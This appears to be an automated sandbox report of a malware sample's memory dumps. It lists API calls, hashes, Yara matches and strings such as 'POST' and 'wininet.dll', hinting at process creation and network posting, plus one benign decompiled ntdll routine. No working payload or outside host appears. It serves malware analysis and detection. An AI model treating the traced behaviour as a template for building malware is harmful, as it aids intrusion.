                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d9eea4a5efb9ef58cd33e370bbc0de696bcbeae1571f224fa2ab0899904e437e
                                                                        • Instruction ID: cd101a76fa0c9f07cc18e3c5b17ac8c1f2525155b165ac45fbd843fb09fb72c4
                                                                        • Opcode Fuzzy Hash: d9eea4a5efb9ef58cd33e370bbc0de696bcbeae1571f224fa2ab0899904e437e
                                                                        • Instruction Fuzzy Hash: DF90027120108906F120615B840476A000597D8385F55C521A8419669D86D5D8957161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 42473a40009ebeb52bb1b15915d40432c3b9804b3a18372274f388fd68fdb82e
                                                                        • Instruction ID: 8695cc624938584a0e69db281d47e5b9af3d7690c334018b67fc92903cf0e79d
                                                                        • Opcode Fuzzy Hash: 42473a40009ebeb52bb1b15915d40432c3b9804b3a18372274f388fd68fdb82e
                                                                        • Instruction Fuzzy Hash: CF90027120100946F110615B4404B66000597E8385F51C126A4119665D8655D8557561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 675b72903bb688858035e3f7dc43ef61cada39aeea83ee1dae950982ba9a0af2
                                                                        • Instruction ID: 71baaf42da623eca123d709d694a4e8c3ed50c3e45c9d505e1bb6e79c25ee4f3
                                                                        • Opcode Fuzzy Hash: 675b72903bb688858035e3f7dc43ef61cada39aeea83ee1dae950982ba9a0af2
                                                                        • Instruction Fuzzy Hash: 0890027120100506F110659B5408666000597E8385F51D121A9019566EC6A5D8957171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: dbd9584c9e14cbfeac0c1788d86c0d74074866548417aecef33e609ea98851da
                                                                        • Instruction ID: ab6bd539f2516cf0a86d82c3fe91b44780911636de1eb3ffc646fa44a308ca57
                                                                        • Opcode Fuzzy Hash: dbd9584c9e14cbfeac0c1788d86c0d74074866548417aecef33e609ea98851da
                                                                        • Instruction Fuzzy Hash: 3290027131114506F120615B8404726000597D9285F51C521A4819569D86D5D8957162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 9d4360831e7ecbfa831661c4add89f97481c376fcdd65b16aa5bf295947faf29
                                                                        • Instruction ID: 3bc4836719af13f8cf4bf223df4a1f27a5815c307fb0e5ba38f9e1f93733c075
                                                                        • Opcode Fuzzy Hash: 9d4360831e7ecbfa831661c4add89f97481c376fcdd65b16aa5bf295947faf29
                                                                        • Instruction Fuzzy Hash: 3690026921300106F190715B540862A000597D9286F91D525A400A569CC955D86D7361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1ea41c5881b82f92d88e6ea0ce6063e75f10842c323bd8acd9606b910806d6b1
                                                                        • Instruction ID: 71eac34a5c35543ef58f8afa778bfdb0b433bf8b75934a0fc4ed35ce0e7c589c
                                                                        • Opcode Fuzzy Hash: 1ea41c5881b82f92d88e6ea0ce6063e75f10842c323bd8acd9606b910806d6b1
                                                                        • Instruction Fuzzy Hash: 6A90027120100517F121615B4504727000997D82C5F91C522A4419569D9696D956B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 641fb9f7ec84cecc23c399618eb2d226d65a4b2a2b15b96ff2c43d02ee63f23c
                                                                        • Instruction ID: 537e50a8da90fa5810de79456b9031f013bc1a7e0db11acff4d9f019c66c1ce3
                                                                        • Opcode Fuzzy Hash: 641fb9f7ec84cecc23c399618eb2d226d65a4b2a2b15b96ff2c43d02ee63f23c
                                                                        • Instruction Fuzzy Hash: 1A900261242042567555B15B44045274006A7E82C5791C122A5409961C8566E85AF661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ed74962d27c763d38bf13a07783f9e5262d6f3ed942c64e9417921b2e67d9007
                                                                        • Instruction ID: 13a6379118870754b863518492e3693e4796b57586f8e50b03e1c72b7ec18ccc
                                                                        • Opcode Fuzzy Hash: ed74962d27c763d38bf13a07783f9e5262d6f3ed942c64e9417921b2e67d9007
                                                                        • Instruction Fuzzy Hash: 659002B120100506F150715B4404766000597D8385F51C121A9059565E8699DDD976A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d80d455c3215c2ee5b9b16aa1d7387798177d4e65d102f2add105fde8051c0ea
                                                                        • Instruction ID: 491cf9bc2908f13e7f12f431628b748e6c0fe1440c31f96a8b1c5ae59844cb92
                                                                        • Opcode Fuzzy Hash: d80d455c3215c2ee5b9b16aa1d7387798177d4e65d102f2add105fde8051c0ea
                                                                        • Instruction Fuzzy Hash: 1E9002A134100546F110615B4414B260005D7E9385F51C125E5059565D8659DC567166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2383b36ada6657a7a5e435c0bb861110c55cbbac054c57af28a556dd0b296a1f
                                                                        • Instruction ID: 4930489b832c411f1faecafd7aac9bf28690145ffd4d818a86d4607fd988cbe6
                                                                        • Opcode Fuzzy Hash: 2383b36ada6657a7a5e435c0bb861110c55cbbac054c57af28a556dd0b296a1f
                                                                        • Instruction Fuzzy Hash: 7F90026121180146F210656B4C14B27000597D8387F51C225A4149565CC955D8657561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00716F78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: POST$net.dll$wininet.dll
                                                                        • API String ID: 3472027048-3140911592
                                                                        • Opcode ID: 0a512bb840092b5117ef9aad79243c2ddc55f4cdb56c5b63530f70b0cd998441
                                                                        • Instruction ID: 65ff6bf0f86291a35bedf6efe009bf1ba8a2e3585996f111db8eef26fa1a3af5
                                                                        • Opcode Fuzzy Hash: 0a512bb840092b5117ef9aad79243c2ddc55f4cdb56c5b63530f70b0cd998441
                                                                        • Instruction Fuzzy Hash: 8931D3B5601204ABD710EF68D8A5FEBBBB9EF44300F00811DF6195B281D778A996CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00716F78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
                                                                        • Instruction ID: 59113d97f33490edb0264e161f5e794cfcd5d217cc22b7aef5afb6ecbb777a25
                                                                        • Opcode Fuzzy Hash: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
                                                                        • Instruction Fuzzy Hash: 6731A1B5601704ABC725DF68D8A5FA7BBB8FB48700F00841DF61A5B281D734B986CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00703B93), ref: 007184ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 91c959601b3d1ba35e92c6480c27c2ca88a064c4cf33e159cab947f3d9ca6d7b
                                                                        • Instruction ID: b8c523ad9e4707967e8a84b34212659397d5dcd386865069d7548ccfa3a2d8b6
                                                                        • Opcode Fuzzy Hash: 91c959601b3d1ba35e92c6480c27c2ca88a064c4cf33e159cab947f3d9ca6d7b
                                                                        • Instruction Fuzzy Hash: DAF0AF71200204ABDB24EF68DC49EE77768EF85310F004449F9489B382DA34EA51CAE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00703B93), ref: 007184ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction ID: 142f6e160edc7bc8cb98be24844c2a212597b167e955f7e95c62bc50fb748b52
                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction Fuzzy Hash: ADE01AB1200204ABDB14DF59DC49EE777ACAF88750F014554BA0857381CA30E9108AF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007072BA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 007072DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                        • Instruction ID: a712b154ea5ecb6caaa6949473aef9e5cd91224134713aaaef0e6c6fe5f5ad42
                                                                        • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                        • Instruction Fuzzy Hash: 8B018432A80228F6E721A6949C47FFE766C6B00B50F150119FF04BA1C2E698690686E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00709B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: 6adb1972a6acb26e033f09ec67910a55db4069c3a0423426a45cd6d57385a109
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: 0B010CB5D4020DFBDB10EAE4EC46FDEB3B89B54318F108295AA0897281F635EB55CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00718584
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 32c230bb39e19ae8fc58c34ad0ee724db985e89cf5ded9415f75a2d0e76ee263
                                                                        • Instruction ID: 7a76a37c9655631f18366f330ded0747a840723bbddbb9a1a743ae194b464dec
                                                                        • Opcode Fuzzy Hash: 32c230bb39e19ae8fc58c34ad0ee724db985e89cf5ded9415f75a2d0e76ee263
                                                                        • Instruction Fuzzy Hash: AF01A4B2204108BFCB54CF99DC80EEB77A9AF8C354F158258FA4DD7251C630E851CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00718584
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction ID: 9238b8a67c69dbd2c5f6dd2f64ccb77ace73090b022f487b3876809e28c5fd70
                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction Fuzzy Hash: FA01AFB2210208BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0070CF92,0070CF92,?,00000000,?,?), ref: 00718650
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6c15e8501506c95730847b73d40eaf1172a68cf1da89939c31c884e119419ecc
                                                                        • Instruction ID: aeb9d609fdc73819ed592f58d41620f320e6b190acdf89d11c4449642d12a4d1
                                                                        • Opcode Fuzzy Hash: 6c15e8501506c95730847b73d40eaf1172a68cf1da89939c31c884e119419ecc
                                                                        • Instruction Fuzzy Hash: 08F0C2B26041106FCB50DF98D885DEB77A9EF85320B04849AF90C9B253D531EA10CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0070CCC0,?,?), ref: 0071703C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                        • Instruction ID: b935b2881a1149b55f61b755ee05671f1f57207b2a71b4aa32a09e08f44d44a2
                                                                        • Opcode Fuzzy Hash: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                        • Instruction Fuzzy Hash: F1E065333803143AE33065ADAC03FE7B29C8B81B20F15002AFA0DEA2C1D999F84142A8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0070CF92,0070CF92,?,00000000,?,?), ref: 00718650
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 2c54343f3b2b22fe554938122dd5a1a80b980b4a9ea8fcbcdce136ae64afadd2
                                                                        • Instruction ID: 3e49e4573b09e725174175181c925ac78989d274df1c77a292c1bc88b41c66ae
                                                                        • Opcode Fuzzy Hash: 2c54343f3b2b22fe554938122dd5a1a80b980b4a9ea8fcbcdce136ae64afadd2
                                                                        • Instruction Fuzzy Hash: 09E039B1600208ABDB10DF58CC85EDB77AAAF89650F018159FA19AB281C930E9418BE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00713506,?,00713C7F,00713C7F,?,00713506,?,?,?,?,?,00000000,00000000,?), ref: 007184AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction ID: 6b011823d05f09a0203e5b77f6b20a4d9c7a9730793fbbc220dd7669da04bd79
                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction Fuzzy Hash: 89E012B1200208ABDB14EF99DC45EE777ACAF88650F118558BA085B382CA30F9108AF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0070CF92,0070CF92,?,00000000,?,?), ref: 00718650
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction ID: 2b271f6db9e0fbe177697d4b6ffe9a44f72809dc1c1091b34c8455bd01cc476e
                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction Fuzzy Hash: C5E01AB1200208ABDB10DF49DC85EE737ADAF89650F018154BA0857381C934E9108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00707C63,?), ref: 0070D42B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: fd3911dc95841e804b95e957e7f73ff6612a7f00b66a6a5c8f4df0dfaa5c6347
                                                                        • Instruction ID: 75124203f31f0e1a6acdef5821a209f21258a1bfe7ff3b5785567bcd762daa08
                                                                        • Opcode Fuzzy Hash: fd3911dc95841e804b95e957e7f73ff6612a7f00b66a6a5c8f4df0dfaa5c6347
                                                                        • Instruction Fuzzy Hash: 2EE0C2616803443AEB20AAB89C07FAB2B865F55344F090068F888DB2C3D915D4018610
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00707C63,?), ref: 0070D42B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction ID: a204747563deb48c5e30ca757f40054f14df0719a329c1bce2ad46af334b9816
                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction Fuzzy Hash: 9FD0A7717903047BE710FAE8DC07F6632CD9B44B00F494064F948D73C3E964F9004161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 8ebd1cbfcd860ad335cfcfcd00836ab264f2a891605b8895180b9b81030c0b05
                                                                        • Instruction ID: 4b9088d37006f8d1a018a98b7b9e3dfb85700e65ee5ea896d8c634a962ed8a1a
                                                                        • Opcode Fuzzy Hash: 8ebd1cbfcd860ad335cfcfcd00836ab264f2a891605b8895180b9b81030c0b05
                                                                        • Instruction Fuzzy Hash: B5B09BF19014C5C9F711D7714A08737791077D4745F16C161D2024655A4778D495F6B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 53%
                                                                        			E0482FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                        				void* _t7;
                                                                        				intOrPtr _t9;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr* _t12;
                                                                        				intOrPtr* _t13;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr* _t15;
                                                                        
                                                                        				_t13 = __edx;
                                                                        				_push(_a4);
                                                                        				_t14 =  *[fs:0x18];
                                                                        				_t15 = _t12;
                                                                        				_t7 = E047DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                        				_push(_t13);
                                                                        				E04825720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                        				_t9 =  *_t15;
                                                                        				if(_t9 == 0xffffffff) {
                                                                        					_t10 = 0;
                                                                        				} else {
                                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                        				}
                                                                        				_push(_t10);
                                                                        				_push(_t15);
                                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                        				return E04825720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                        			}

                                                                        Instruction addresses of the listing above: 0x0482fdda, 0x0482fde2, 0x0482fde5, 0x0482fdec, 0x0482fdfa, 0x0482fdff, 0x0482fe0a, 0x0482fe0f, 0x0482fe17, 0x0482fe1e, 0x0482fe19, 0x0482fe19, 0x0482fe19, 0x0482fe20, 0x0482fe21, 0x0482fe22, 0x0482fe25, 0x0482fe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0482FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0482FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0482FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 88b37df517fbea510ea6bcdef4d551d5ea362c1489379276923125571fe6529d
                                                                        • Instruction ID: 79bd3b15a49be9ca22ac49a47f16a2d8fa736ba6c1ebc99c6713af0951a936a1
                                                                        • Opcode Fuzzy Hash: 88b37df517fbea510ea6bcdef4d551d5ea362c1489379276923125571fe6529d
                                                                        • Instruction Fuzzy Hash: D1F04C766801007FE6211A45CD01F337F6ADB40730F140305F714951D1EAA2FC60D6F4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%